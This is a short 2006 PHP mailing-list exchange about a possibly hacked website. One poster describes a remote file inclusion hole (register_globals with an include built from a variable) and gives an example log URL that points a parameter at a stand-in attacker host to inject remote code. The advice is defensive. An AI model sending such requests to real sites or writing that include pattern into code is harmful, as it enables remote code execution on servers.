At 12:38 PM -0500 11/13/06, Eric Butera wrote:
Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing.
I don't have a shopping cart script on the site. However, register_globals are ON, but I turn them off in my scripts.
If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
I just looked at my logs and they only go back one day -- interesting. tedd -- ------- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
